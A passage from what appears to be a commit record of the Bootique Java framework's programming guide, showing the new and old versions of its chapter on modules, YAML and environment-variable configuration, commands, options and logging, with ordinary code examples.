app `-H` flag to print supported config to the console). Here we'll discuss how to build your own configuration-aware module.\n\nBootique allows each Module to read its specific configuration subtree as an object of the type defined in the Module. Very often such an object is written as a factory that contains a bunch of setters for configuration properties, and a factory method to produce some \"service\" that a Module is interested in. Here is an example factory:\n\n[source,java]\n----\npublic class MyFactory {\n\n private int intProperty;\n private String stringProperty;\n\n public void setIntProperty(int i) {\n this.intProperty = i;\n }\n\n public void setStringProperty(String s) {\n this.stringProperty = s;\n }\n\n \/\/ factory method\n public MyService createMyService(SomeOtherService soService) {\n return new MyServiceImpl(soService, intProperty, stringProperty);\n }\n}\n----\n\nThe factory contains configuration property declarations, as well as public setters for these properties. (You may\ncreate getters as well. It is not required, but may be useful for unit tests, etc.). Now let's take a look at the\nModule class:\n\n[source,java]\n----\npublic class MyModule extends ConfigModule {\n\n @Singleton\n @Provides\n public MyService createMyService(\n ConfigurationFactory configFactory,\n SomeOtherService service) {\n\n return config(MyFactory.class, configFactory).createMyService(service);\n }\n}\n----\n\nA sample configuration that will work with our module may look like this:\n\n[source,yaml]\n----\nmy:\n intProperty: 55\n stringProperty: 'Hello, world!'\n----\n\nA few points to note here:\n\n* Subclassing from `ConfigModule` is optional. `ConfigModule` provides a few utilities, such as a shorter \"config\"\nmethod and a default configuration key (\"my\" in this case. See the next bullet).\n* Calling our module \"MyModule\" and extending from `ConfigModule` gives it access to the protected \"configPrefix\"\nproperty that is initialized to the value of \"my\" based on the module class name. The naming convention here is to use\nthe Module simple class name without the \"Module\" suffix and converted to lowercase.\n* `@Provides` annotation is a Guice way of marking a Module method as a \"provider\" for a certain type of injectable\nservice. All its parameters are themselves injectable objects.\n* `ConfigurationFactory` is the class used to bind a subtree of the app YAML configuration to a given Java object\n(in our case - MyFactory). The structure of MyFactory is very simple here, but it can be as complex as needed,\ncontaining nested objects, arrays, maps, etc. Internally Bootique uses\nhttps:\/\/github.com\/FasterXML\/jackson[Jackson framework] to bind YAML to a Java class, so all the features of Jackson\ncan be used to craft configuration.\n\n==== Configuration File Loading\n\nA config file can be passed to a Bootique app via DI (those are usually coming from classpath) or on the command line:\n\n* Contributing a config file via DI:\n+\n[source,java]\n----\nBQCoreModule.extend(binder).addConfig(\"classpath:com\/foo\/default.yml\");\n----\n+\nA primary motivation for this style is to provide application default configuration, with YAML files often embedded in\nthe app and read from the classpath (as suggested by the \"classpath:..\" URL in the example). More then one configuration\ncan be contributed. E.g. individual modules might load their own defaults. Multiple configs are combined in a single\nconfig tree by the runtime. The order in which this combination happens is undefined, so make sure there are no conflicts\nbetween them. If there are, consider replacing multiple conflicting configs with a single config.\n\n* Conditionally contributing a config file via DI. It is possible to make DI configuration inclusion conditional on the\npresence of a certain command line option:\n+\n[source,java]\n----\nOptionMetadata o = OptionMetadata.builder(\"qa\")\n .description(\"when present, uses QA config\")\n .build();\n\nBQCoreModule.extend(binder)\n .addOption(o)\n .mapConfigResource(o.getName(), \"classpath:a\/b\/qa.yml\");\n----\n\n* Specifying a config file on the command line. Each Bootique app supports `--config` option that takes a configuration\nfile as parameter. To specify more than one file, use `--config` option multiple times. Configurations will be loaded\nand merged together in the order of their appearance on the command line.\n\n* Specifying a single config value via a custom option:\n+\n[source,java]\n----\nOptionMetadata o = OptionMetadata.builder(\"db\")\n .description(\"specifies database URL\")\n .valueOptionalWithDefault(\"jdbc:mysql:\/\/127.0.0.1:3306\/mydb\")\n .build();\n\nBQCoreModule.extend(binder)\n .addOption(o)\n .mapConfigPath(o.getName(), \"jdbc.mydb.url);\n----\n+\nThis adds a new `--db` option to the app that can be used to set JDBC URL of a datasource called \"mydb\". If value is\nnot specified, the default one will be used.\n\n==== Configuration via Properties\n\nYAML file can be thought of as a set of nested properties. E.g. the following config\n\n[source,yaml]\n----\nmy:\n prop1: val1\n prop2: val2\n----\n\ncan be represented as two properties (\"my.prop1\", \"my.prop2\") being assigned some values. Bootique takes advantage of this structural equivalence and allows to define configuration via properties as an alternative (or more frequently - an addition) to YAML. If the same \"key\" is defined in both YAML file and a property, `ConfigurationFactory` would use the value of the property (in other words properties override YAML values).\n\nTo turn a given property into a configuration property, you need to prefix it with \"`bq.`\". This \"namespace\" makes configuration explicit and helps to avoid random naming conflicts with properties otherwise present in the system.\n\nProperties can be provided to Bootique via BQCoreModule extender:\n\n[source,java]\n----\nclass MyModule implements Module {\n public void configure(Binder binder) {\n\n BQCoreModule.extend(binder)\n .setProperty(\"bq.my.prop1\", \"valX\")\n .setProperty(\"bq.my.prop2\", \"valY\");\n }\n}\n----\n\nAlternatively they can be loaded from system properties. E.g.:\n\n[source,bash]\n----\njava -Dbq.my.prop1=valX -Dbq.my.prop2=valY -jar myapp.jar\n----\n\nThough generally this approach is sneered upon, as the authors of Bootique are striving to make Java apps look minimally \"weird\" in deployment, and \"-D\" is one of those unintuitive \"Java-only\" things. Often a better alternative is to define the bulk of configuration in YAML, and pass values for a few environment-specific properties via shell variables (see the next section) or bind them to CLI flags.\n\n==== Configuration via Environment Variables\n\nBootique allows to use _environment variables_ to specify\/override configuration values. While variables work similar to JVM properties, using them has advantages in certain situations:\n\n* They may be used to configure credentials, as unlike YAML they won't end up in version control, and unlike Java properties, they won't be visible in the process list.\n* They provide customized application environment without changing the launch script and are ideal for containerized and other virtual environments.\n* They are more user-friendly and appear in the app help.\n\nTo declare variables associated with configuration values, use the following API (notice that no \"bq.\" prefix is necessary here to identify the configuration value):\n\n[source,java]\n----\nclass MyModule implements Module {\n public void configure(Binder binder) {\n\n BQCoreModule.extend(binder)\n .declareVar(\"my.prop1\", \"P1\")\n .declareVar(\"my.prop2\", \"P2\");\n }\n}\n----\n\nSo now a person running the app may set the above configuration as\n\n[source,bash]\n----\nexport P1=valX\nexport P2=valY\n----\n\nMoreover, explicitly declared vars will automatically appear in the application help, assisting the admins in configuring your app\n\n_(TODO: document BQConfig and BQConfigProperty config factory annotations required for the help generation to work)_\n\n[source,bash]\n----\n$ java -jar myapp-1.0.jar --help\n...\nENVIRONMENT\n P1\n Sets value of some property.\n\n P2\n Sets value of some other property.\n----\n\n==== Polymorphic Configuration Objects\n\nA powerful feature of Jackson is the ability to dynamically create subclasses of the configuration objects. Bootique takes full advantage of this. E.g. imagine a logging module that needs \"appenders\" to output its log messages (file appender, console appender, syslog appender, etc.). The framework might not be aware of all possible appenders its users might come up with in the future. Yet it still wants to have the ability to instantiate any of them, based solely on the data coming from YAML. Moreover each appender will have its own set of incompatible configuration properties. In fact this is exactly the situation with `bootique-logback` module.\n\nHere is how you ensure that such a polymorphic configuration is possible. Let's start with a simple class hierarchy:\n\n[source,java]\n----\npublic abstract class BaseType {\n \/\/ ...\n}\n\npublic class ConcreteType1 extends BaseType {\n \/\/ ...\n}\n\npublic class ConcreteType2 extends BaseType {\n \/\/ ...\n}\n----\n\nNow let's create a matching set of factories to create one of the concrete subtypes of `BaseType`. Let's use Jackson annotations to link\nspecific types of symbolic names to be used in YAML below:\n\n[source,java]\n----\n@JsonTypeInfo(use = JsonTypeInfo.Id.NAME,\n property = \"type\",\n defaultImpl = ConcreteTypeFactory1.class)\npublic abstract class BaseTypeFactory implements PolymorphicConfiguration {\n\n public abstract BaseType create();\n}\n\n@JsonTypeName(\"type1\")\npublic class ConcreteTypeFactory1 extends BaseTypeFactory {\n\n @Override\n public BaseType create() {\n return new ConcreteType1();\n }\n}\n\n@JsonTypeName(\"type2\")\npublic class ConcreteTypeFactory2 extends BaseTypeFactory {\n\n @Override\n public BaseType create() {\n return new ConcreteType2();\n }\n}\n----\n\nAfter that we need to create a service provider file called `META-INF\/service\/io.bootique.config.PolymorphicConfiguration` where all the types participating in the hierarchy are listed (including the supertype):\n\n[source,text]\n----\ncom.foo.BaseTypeFactory\ncom.foo.ConcreteTypeFactory1\ncom.foo.ConcreteTypeFactory2\n----\n\nThis should be enough to work with configuration like this:\n\n[source,yaml]\n----\nmy:\n type: type2\n someVar: someVal\n----\n\nThe service of `BaseType` is bound in Guice using the standard `ConfigurationFactory` approach described above. Depending on the YAML config,\none of the subclasses of `BaseType` will be created:\n\n[source,java]\n----\n@Provides\npublic BaseType provideBaseType(ConfigurationFactory configFactory) {\n\n return configFactory\n .config(BaseTypeFactory.class, \"my\")\n .create();\n}\n----\n\nIf another module decides to create yet another subclass of BaseType, it will need to create its own `META-INF\/service\/io.bootique.config.PolymorphicConfiguration` file and add a new factory name there.\n\n=== Using Modules\n\nModules can use other \"upstream\" modules in a few ways:\n\n* \"Import\": a downstream module uses another module as a library, ignoring its injectable services.\n* \"Use\" : downstream module's classes inject classes from an upstream module.\n* \"Contribute\": downstream module injects objects to collections and maps defined in upstream modules.\n\nImport case is trivial, so we'll concentrate on the two remaining scenarios. We will use https:\/\/github.com\/bootique\/bootique\/blob\/master\/bootique\/src\/main\/java\/io\/bootique\/BQCoreModule.java[BQCoreModule] as an example of an upstream module, as it is available in all apps.\n\n==== Injecting Other Module's Services\n\nYou can inject any services declared in other modules. E.g. BQCoreModule provides a number of objects and services that can be accessed via injection:\n\n[source,java]\n----\nclass MyService {\n\n @Args\n @Inject\n private String[] args;\n\n public String getArgsString() {\n return Arrays.asList(getArgs()).stream().collect(joining(\" \"));\n }\n}\n----\n\nIn this example we injected command line arguments that were used to start the app. Note that since there can potentially be more than one `String[]` in a DI container, Bootique `@Args` annotation is used to uniquely identify the array that we want here.\n\n==== Contributing to Other Modules\n\nGuice supports https:\/\/github.com\/google\/guice\/wiki\/Multibindings[multibindings], intended to _contribute_ objects defined in a downstream module to collections\/maps used by services in upstream modules. Bootique hides Guice API complexities, usually providing \"extenders\" in each module. E.g. the following code adds `MyCommand` the the app set of commands:\n\n[source,java]\n----\npublic class MyModule implements Module {\n\n @Override\n public void configure(Binder binder) {\n BQCoreModule.extend(binder).addCommand(MyCommand.class);\n }\n}\n----\n\nHere we obtained an extender instance via a static method on BQCoreModule. Most standard modules define their own extenders accessible via `"extend(Binder)"`. This is a pattern you might want to follow in your own modules.\n\n=== Application Class\n\nA class that contains the `"main()"` method is informally called \"application\". Bootique does not impose any additional requirements on this class. You decide what to put in it. It can be limited to just `"main()"`, or turned into a REST API resource, etc.\n\n==== Application as a Module\n\nMost often then not it makes sense to turn the application class into a Module though. After all a Bootique app is just a collection of Modules, and this way the application class would represent that one final Module to rule them all:\n\n[source,java]\n----\npublic class Application implements Module {\n\n public static void main(String[] args) {\n Bootique.app(args).module(Application.class).autoLoadModules().exec().exit();\n }\n\n public void configure(Binder binder) {\n \/\/ load app-specific services; redefine standard ones\n }\n}\n----\n\nYou may also implement a separate BQModuleProvider for the Application module. Then `autoLoadModules()` will discover it just like any other Module, and there won't be a need to add Application module explicitly.\n\n==== Common Main Class\n\nIf all your code is packaged in auto-loadable modules (which is always a good idea), you may not even need a custom main class. `io.bootique.Bootique` class itself declares a `main()` method and can be used as an app launcher. This creates some interesting possibilities. E.g. you can create Java projects that have no code of their own and are simply collections of modules declared as compile dependencies. More details on packaging are given in the \"Runnable Jar\" chapter.\n\n=== Commands\n\nBootique runtime contains a set of commands coming from Bootique core and from all the modules currently in effect in the app. On startup Bootique attempts to map command-line arguments to a single command type. If no match is found, a _default_ command is executed (which is normally a \"help\" command). To list all available commands, the app can be run with `--help` option (in most cases running without any options will have the same effect). E.g.:\n\n[source,bash]\n----\n$ java -jar myapp-1.0.jar --help\n\nNAME\n com.foo.MyApp\n\nOPTIONS\n -c yaml_location, --config=yaml_location\n Specifies YAML config location, which can be a file path or a URL.\n\n -h, --help\n Prints this message.\n\n -H, --help-config\n Prints information about application modules and their configuration\n options.\n\n -s, --server\n Starts Jetty server.\n\n----\n\n==== Writing Commands\n\nMost common commands are already available in various standard modules, still often you'd need to write your own. To do that, first create a command class. It should implement `io.bootique.command.Command` interface, though usually it more practical to extend `io.bootique.command.CommandWithMetadata` and provide some metadata used in help and elsewhere:\n\n[source,java]\n----\npublic class MyCommand extends CommandWithMetadata {\n\n private static CommandMetadata createMetadata() {\n return CommandMetadata.builder(MyCommand.class)\n .description(\"My command does something important.\")\n .build();\n }\n\n public MyCommand() {\n super(createMetadata());\n }\n\n @Override\n public CommandOutcome run(Cli cli) {\n\n \/\/ ... run the command here....\n\n return CommandOutcome.succeeded();\n }\n}\n----\n\nThe command initializes metadata in constructor and implements the \"run\" method to run its code. The return CommandOutcome object instructs Bootique what to do when the command finishes. The object contains desired system exit code, and exceptions that occurred during execution. To make the new command available to Bootique, add it to `BQCoreModule`'s extender, as was already shown above:\n\n[source,java]\n----\npublic class MyModule implements Module {\n\n @Override\n public void configure(Binder binder) {\n BQCoreModule.extend(binder).addCommand(MyCommand.class);\n }\n}\n----\n\nTo implement a \"daemon\" command running forever until it receives an OS signal (e.g. a web server waiting for user requests) , do something like this:\n\n[source,java]\n----\n@Override\npublic CommandOutcome run(Cli cli) {\n\n \/\/ ... start some process in a different thread ....\n\n \/\/ now wait till the app is stopped from another thread\n \/\/ or the JVM is terminated\n try {\n Thread.currentThread().join();\n } catch (InterruptedException e) {\n \/\/ ignore exception or log if needed\n }\n\n return CommandOutcome.succeeded();\n}\n----\n\n==== Injection in Commands\n\nCommands can inject services, just like most other classes in Bootique. There are some specifics though. Since commands are sometimes instantiated, but not executed (e.g. when `--help` is run that lists all commands), it is often desirable to avoid immediate instantiation of all dependencies of a given command. So a common pattern with commands is to inject Guice `Provider` instead of direct dependency:\n\n[source,java]\n----\n@Inject\nprivate Provider<SomeService> provider;\n\n@Override\npublic CommandOutcome run(Cli cli) {\n provider.get().someMethod();\n}\n----\n\n==== Decorating Commands\n\nEach command typically does a single well-defined thing, such as starting a web server, executing a job, etc. But very often in addition to that main thing you need to do other things. E.g. when a web server is started, you might also want to run a few more commands:\n\n* Before starting the server, run a health check to verify that any external services the app might depend upon are alive.\n* Start a job scheduler in the background.\n* Start a monitoring \"heartbeat\" thread.\n\nTo run all these \"secondary\" commands when the main command is invoked, Bootique provides command decorator API. First you create a decorator policy object that specifies one or more secondary commands and their invocation strategy (either _before_ the main command, or _in parallel_ with it). Second you \"decorate\" the main command with that policy:\n\n[source,java]\n----\nCommandDecorator extraCommands = CommandDecorator\n .beforeRun(CustomHealthcheckCommand.class)\n .alsoRun(ScheduleCommand.class)\n .alsoRun(HeartbeatCommand.class);\n\nBQCoreModule.extend(binder).decorateCommand(ServerCommand.class, extraCommands);\n----\n\nBased on the specified policy Bootique figures out the sequence of execution and runs the main and the secondary commands.\n\n=== Options\n\n==== Simple Options\n\nIn addition to commands, the app can define \"options\". Options are not associated with any runnable java code, and simply pass command-line values to commands and services. E.g. the standard \"`--config`\" option is used by `CliConfigurationSource` service to locate configuration file. Unrecognized options cause application startup errors. To be recognized, options need to be \"contributed\" to Bootique similar to commands:\n\n[source,java]\n----\nOptionMetadata option = OptionMetadata\n .builder(\"email\", \"An admin email address\")\n .valueRequired(\"email_address\")\n .build();\n\nBQCoreModule.extend(binder).addOption(option);\n----\n\nTo read a value of the option, a service should inject `io.bootique.cli.Cli` object (commands also get this object as a parameter to \"run\") :\n\n[source,java]\n----\n@Inject\nprivate Cli cli;\n\npublic void doSomething() {\n Collection<String> emails = cli.optionStrings(\"email\");\n \/\/ do something with option values....\n}\n----\n\n==== Configuration Options\n\nWhile you can process your own options as described above, options often are just aliases to enable certain pieces of configuration. Bootique supports three flavors of associating options with configuration. Let's demonstrate them here.\n\n. Option value sets a config property:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt=x\" will set \"jobs.myjob.param\" value to \"x\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").build())\n .mapConfigPath(\"my-opt\", \"jobs.myjob.param\");\n----\n. Option presence sets a property to a predefined value:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt\" will set \"jobs.myjob.param\" value to \"y\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").valueOptionalWithDefault(\"y\").build())\n .mapConfigPath(\"my-opt\", \"jobs.myjob.param\");\n----\n. Option presence loads a config resource, such as a YAML file:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt\" is equivalent to starting with \"--config=classpath:xyz.yml\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").build())\n .mapConfigResource(\"my-opt\", \"classpath:xyz.yml\");\n----\n\nThe order of config-bound options on the command line is significant, just as the order of \"`--config`\" parameters. Bootique merges configuration associated with options from left to right, overriding any preceding configuration if there is an overlap.\n\n=== Logging\n\n==== Loggers in the Code\n\nStandard Bootique modules use http:\/\/www.slf4j.org\/[SLF4J] internally, as it is the most convenient least common denominator framework, and can be easily bridged to other logging implementations. Your apps or modules are not required to use SLF4J, though if they do, it will likely reduce the amount of bridging needed to route all logs to a single destination.\n\n==== Configurable Logging with Logback\n\nFor better control over logging a standard module called `bootique-logback` is available, that integrates http:\/\/logback.qos.ch\/[Logback framework] in the app. It seamlessly bridges SLF4J (so you keep using SLF4J in the code), and allows to configure logging via YAML config file, including appenders (file, console, etc.) and per class\/package log levels. Just like any other module, `bootique-logback` can be enabled by simply adding it to the pom.xml dependencies, assuming `autoLoadModules()` is in effect:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.bootique.logback<\/groupId>\n <artifactId>bootique-logback<\/artifactId>\n<\/dependency>\n----\n\nSee `bootique-logback` module http:\/\/bootique.io\/docs\/0\/bootique-logback-docs\/[documentation] for further details.\n\n==== BootLogger\n\nTo perform logging during startup, before DI environment is available and YAML configuration is processed, Bootique uses a special service called `BootLogger`, that is not dependent on SLF4J and is not automatically bridged to Logback. It provides an abstraction for writing to stdout \/ stderr, as well as conditional \"trace\" logs sent to stderr. To enable Bootique trace logs, start the app with `-Dbq.trace` as described in the deployment section.\n\nBootLogger is injectable, in case your own code needs to use it. If the default BootLogger behavior is not satisfactory, it can be overridden right in the `main(..)` method, as unlike other services, you may need to change it before DI is available:\n\n[source,java]\n----\npublic class Application {\n public static void main(String[] args) {\n Bootique.app(args).bootLogger(new MyBootLogger()).run();\n }\n}\n----\n","old_contents":"\/\/ Licensed to ObjectStyle LLC under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ObjectStyle LLC licenses\n\/\/ this file to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n== Part II. Programming\n\n=== Modules\n\nBootique apps are made of \"modules\". The framework simply locates all available modules, loads them in the DI environment,\nparses the command line, and then transfers control to a Command (that can originate from any of the modules) that\nmatched the user choice. There's a growing list of modules created by Bootique development team. And you can easily\nwrite your own. In fact, programming in Bootique is primarily about writing Modules.\n\nA module is a Java library that contains some code. What makes it a module is a special Java class that implements\nhttps:\/\/google.github.io\/guice\/api-docs\/latest\/javadoc\/index.html?com\/google\/inject\/Module.html[Guice Module interface].\nThis class defines what \"services\" or other types of objects the module provides (in other words what will be injectable\nby the module users). This is done in a form of \"bindings\", i.e. associations between publicly visible injectable\nservice interfaces and specific implementations:\n\n[source,java]\n----\npublic class MyModule implements Module {\n @Override\n public void configure(Binder binder) {\n binder.bind(MyService.class).to(MyServiceImpl.class);\n }\n}\n----\n\nThere are other flavors of bindings in Guice. Please refer to https:\/\/github.com\/google\/guice\/wiki\/Motivation[Guice documentation]\nfor details. One important form extensively used in Bootique is https:\/\/github.com\/google\/guice\/wiki\/Multibindings[Multibinding].\n\n=== Modules Auto-Loading\n\nModules can be automatically loaded via `Bootique.autoLoadModules()` as long as they are included in your application dependencies. Auto-loading depends on the Java https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[ServiceLoader mechanism]. To ensure your modules can be auto-loaded do two things. First implement `io.bootique.BQModuleProvider` interface specific to your module:\n\n[source,java]\n----\npublic class MyModuleProvider implements BQModuleProvider {\n @Override\n public Module module() {\n return new MyModule();\n }\n}\n----\n\nAfter that create a file `META-INF\/services\/io.bootique.BQModuleProvider` with the only line being the name of your BQModuleProvider implementor. E.g.:\n\n[source,text]\n----\ncom.foo.MyModuleProvider\n----\n\n`BQModuleProvider` has two more methods that you can optionally implement to help Bootique to make sense of the module being loaded:\n\n[source,java]\n----\npublic class MyModuleProvider implements BQModuleProvider {\n \/\/ ...\n\n \/\/ provides human-readable name of the module\n @Override\n public String name() {\n return \"CustomName\";\n }\n\n \/\/ a collection of modules whose services are overridden by this module\n @Override\n public Collection<Class<? extends Module>> overrides() {\n return Collections.singleton(BQCoreModule.class);\n }\n}\n----\n\nIf in your Module you are planning to redefine any services from the upstream modules, specify those upstream modules in the `overrides()` collection. In practice overrides are rarely needed, and often can be replaced with service decomposition.\n\n=== Configuration and Configurable Factories\n\nBootique Modules obtain their configuration in a form of \"factory objects\". We'll show some examples shortly. For now let's focus on the big picture, namely the fact that Bootique app configuration is multi-layered and roughly follows the sequence of \"code - config files (contributed) - config files (CLI) - overrides\". \"Code\" is the default values that are provided in constructors of factory objects. Config files overlay those defaults with their own values. Config files can be either contributed in the code, or specified on the command line. Files is where the bulk of configuration usually stored. Finally config values may be further overridden via Java properties and\/or environment variables.\n\n==== Configuration via YAML Files\n\nFormat of configuration file can be either JSON or YAML. For simplicity we'll focus on YAML format, but the two are interchangeable. Here is an example config file:\n\n[source,yaml]\n----\nlog:\n level: warn\n appenders:\n - type: file\n logFormat: '%c{20}: %m%n'\n file: target\/logback\/debug.log\n\njetty:\n context: \/myapp\n connectors:\n - port: 12009\n----\n\nWhile not strictly required, as a rule the top-level keys in the file belong to configuration objects of individual modules. In the example above \"log\" subtree configures `bootique-logback` module, while \"jetty\" subtree configures `bootique-jetty`. For standard modules refer to module-specific documentation on the structure of the supported configuration (or run your app `-H` flag to print supported config to the console). Here we'll discuss how to build your own configuration-aware module.\n\nBootique allows each Module to read its specific configuration subtree as an object of the type defined in the Module. Very often such an object is written as a factory that contains a bunch of setters for configuration properties, and a factory method to produce some \"service\" that a Module is interested in. Here is an example factory:\n\n[source,java]\n----\npublic class MyFactory {\n\n private int intProperty;\n private String stringProperty;\n\n public void setIntProperty(int i) {\n this.intProperty = i;\n }\n\n public void setStringProperty(String s) {\n this.stringProperty = s;\n }\n\n \/\/ factory method\n public MyService createMyService(SomeOtherService soService) {\n return new MyServiceImpl(soService, intProperty, stringProperty);\n }\n}\n----\n\nThe factory contains configuration property declarations, as well as public setters for these properties. (You may\ncreate getters as well. It is not required, but may be useful for unit tests, etc.). Now let's take a look at the\nModule class:\n\n[source,java]\n----\npublic class MyModule extends ConfigModule {\n\n @Singleton\n @Provides\n public MyService createMyService(\n ConfigurationFactory configFactory,\n SomeOtherService service) {\n\n return config(MyFactory.class, configFactory).createMyService(service);\n }\n}\n----\n\nA sample configuration that will work with our module may look like this:\n\n[source,yaml]\n----\nmy:\n intProperty: 55\n stringProperty: 'Hello, world!'\n----\n\nA few points to note here:\n\n* Subclassing from `ConfigModule` is optional. `ConfigModule` provides a few utilities, such as a shorter \"config\"\nmethod and a default configuration key (\"my\" in this case. See the next bullet).\n* Calling our module \"MyModule\" and extending from `ConfigModule` gives it access to the protected \"configPrefix\"\nproperty that is initialized to the value of \"my\" based on the module class name. The naming convention here is to use\nthe Module simple class name without the \"Module\" suffix and converted to lowercase.\n* `@Provides` annotation is a Guice way of marking a Module method as a \"provider\" for a certain type of injectable\nservice. All its parameters are themselves injectable objects.\n* `ConfigurationFactory` is the class used to bind a subtree of the app YAML configuration to a given Java object\n(in our case - MyFactory). The structure of MyFactory is very simple here, but it can be as complex as needed,\ncontaining nested objects, arrays, maps, etc. Internally Bootique uses\nhttps:\/\/github.com\/FasterXML\/jackson[Jackson framework] to bind YAML to a Java class, so all the features of Jackson\ncan be used to craft configuration.\n\n==== Configuration File Loading\n\nA config file can be passed to a Bootique app via DI (those are usually coming from classpath) or on the command line:\n\n* Contributing a config file via DI:\n+\n[source,java]\n----\nBQCoreModule.extend(binder).addConfig(\"classpath:com\/foo\/default.yml\");\n----\n+\nA primary motivation for this style is to provide application default configuration, with YAML files often embedded in\nthe app and read from the classpath (as suggested by the \"classpath:..\" URL in the example). More then one configuration\ncan be contributed. E.g. individual modules might load their own defaults. Multiple configs are combined in a single\nconfig tree by the runtime. The order in which this combination happens is undefined, so make sure there are no conflicts\nbetween them. If there are, consider replacing multiple conflicting configs with a single config.\n\n* Conditionally contributing a config file via DI. It is possible to make DI configuration inclusion conditional on the\npresence of a certain command line option:\n+\n[source,java]\n----\nOptionMetadata o = OptionMetadata.builder(\"qa\")\n .description(\"when present, uses QA config\")\n .build();\n\nBQCoreModule.extend(binder)\n .addOption(o)\n .mapConfigResource(o.getName(), \"classpath:a\/b\/qa.yml\");\n----\n\n* Specifying a config file on the command line. Each Bootique app supports `--config` option that takes a configuration\nfile as parameter. To specify more than one file, use `--config` option multiple times. Configurations will be loaded\nand merged together in the order of their appearance on the command line.\n\n* Specifying a single config value via a custom option:\n+\n[source,java]\n----\nOptionMetadata o = OptionMetadata.builder(\"db\")\n .description(\"specifies database URL\")\n .valueOptionalWithDefault(\"jdbc:mysql:\/\/127.0.0.1:3306\/mydb\")\n .build();\n\nBQCoreModule.extend(binder)\n .addOption(o)\n .mapConfigPath(o.getName(), \"jdbc.mydb.url);\n----\n+\nThis adds a new `--db` option to the app that can be used to set JDBC URL of a datasource called \"mydb\". If value is\nnot specified, the default one will be used.\n\n==== Configuration via Properties\n\nYAML file can be thought of as a set of nested properties. E.g. the following config\n\n[source,yaml]\n----\nmy:\n prop1: val1\n prop2: val2\n----\n\ncan be represented as two properties (\"my.prop1\", \"my.prop2\") being assigned some values. Bootique takes advantage of this structural equivalence and allows to define configuration via properties as an alternative (or more frequently - an addition) to YAML. If the same \"key\" is defined in both YAML file and a property, `ConfigurationFactory` would use the value of the property (in other words properties override YAML values).\n\nTo turn a given property into a configuration property, you need to prefix it with \"`bq.`\". This \"namespace\" makes configuration explicit and helps to avoid random naming conflicts with properties otherwise present in the system.\n\nProperties can be provided to Bootique via BQCoreModule extender:\n\n[source,java]\n----\nclass MyModule implements Module {\n public void configure(Binder binder) {\n\n BQCoreModule.extend(binder)\n .setProperty(\"bq.my.prop1\", \"valX\")\n .setProperty(\"bq.my.prop2\", \"valY\");\n }\n}\n----\n\nAlternatively they can be loaded from system properties. E.g.:\n\n[source,bash]\n----\njava -Dbq.my.prop1=valX -Dbq.my.prop2=valY -jar myapp.jar\n----\n\nThough generally this approach is sneered upon, as the authors of Bootique are striving to make Java apps look minimally \"weird\" in deployment, and \"-D\" is one of those unintuitive \"Java-only\" things. Often a better alternative is to define the bulk of configuration in YAML, and pass values for a few environment-specific properties via shell variables (see the next section) or bind them to CLI flags.\n\n==== Configuration via Environment Variables\n\nBootique allows to use _environment variables_ to specify\/override configuration values. While variables work similar to JVM properties, using them has advantages in certain situations:\n\n* They may be used to configure credentials, as unlike YAML they won't end up in version control, and unlike Java properties, they won't be visible in the process list.\n* They provide customized application environment without changing the launch script and are ideal for containerized and other virtual environments.\n* They are more user-friendly and appear in the app help.\n\nTo declare variables associated with configuration values, use the following API (notice that no \"bq.\" prefix is necessary here to identify the configuration value):\n\n[source,java]\n----\nclass MyModule implements Module {\n public void configure(Binder binder) {\n\n BQCoreModule.extend(binder)\n .declareVar(\"my.prop1\", \"P1\")\n .declareVar(\"my.prop2\", \"P2\");\n }\n}\n----\n\nSo now a person running the app may set the above configuration as\n\n[source,bash]\n----\nexport P1=valX\nexport P2=valY\n----\n\nMoreover, explicitly declared vars will automatically appear in the application help, assisting the admins in configuring your app\n\n_(TODO: document BQConfig and BQConfigProperty config factory annotations required for the help generation to work)_\n\n[source,bash]\n----\n$ java -jar myapp-1.0.jar --help\n...\nENVIRONMENT\n P1\n Sets value of some property.\n\n P2\n Sets value of some other property.\n----\n\nNOTE: Notice that previously used naming conventions to bind variables that start with `BQ_*` to config values are deprecated and support for them will be removed soon. Such approach was causing too much unexpected behavior in non-containerized environments. The alternative is explicitly declared variables described above.\n\n==== Polymorphic Configuration Objects\n\nA powerful feature of Jackson is the ability to dynamically create subclasses of the configuration objects. Bootique takes full advantage of this. E.g. imagine a logging module that needs \"appenders\" to output its log messages (file appender, console appender, syslog appender, etc.). The framework might not be aware of all possible appenders its users might come up with in the future. Yet it still wants to have the ability to instantiate any of them, based solely on the data coming from YAML. Moreover each appender will have its own set of incompatible configuration properties. In fact this is exactly the situation with `bootique-logback` module.\n\nHere is how you ensure that such a polymorphic configuration is possible. Let's start with a simple class hierarchy:\n\n[source,java]\n----\npublic abstract class BaseType {\n \/\/ ...\n}\n\npublic class ConcreteType1 extends BaseType {\n \/\/ ...\n}\n\npublic class ConcreteType2 extends BaseType {\n \/\/ ...\n}\n----\n\nNow let's create a matching set of factories to create one of the concrete subtypes of `BaseType`. Let's use Jackson annotations to link\nspecific types of symbolic names to be used in YAML below:\n\n[source,java]\n----\n@JsonTypeInfo(use = JsonTypeInfo.Id.NAME,\n property = \"type\",\n defaultImpl = ConcreteTypeFactory1.class)\npublic abstract class BaseTypeFactory implements PolymorphicConfiguration {\n\n public abstract BaseType create();\n}\n\n@JsonTypeName(\"type1\")\npublic class ConcreteTypeFactory1 extends BaseTypeFactory {\n\n @Override\n public BaseType create() {\n return new ConcreteType1();\n }\n}\n\n@JsonTypeName(\"type2\")\npublic class ConcreteTypeFactory2 extends BaseTypeFactory {\n\n @Override\n public BaseType create() {\n return new ConcreteType2();\n 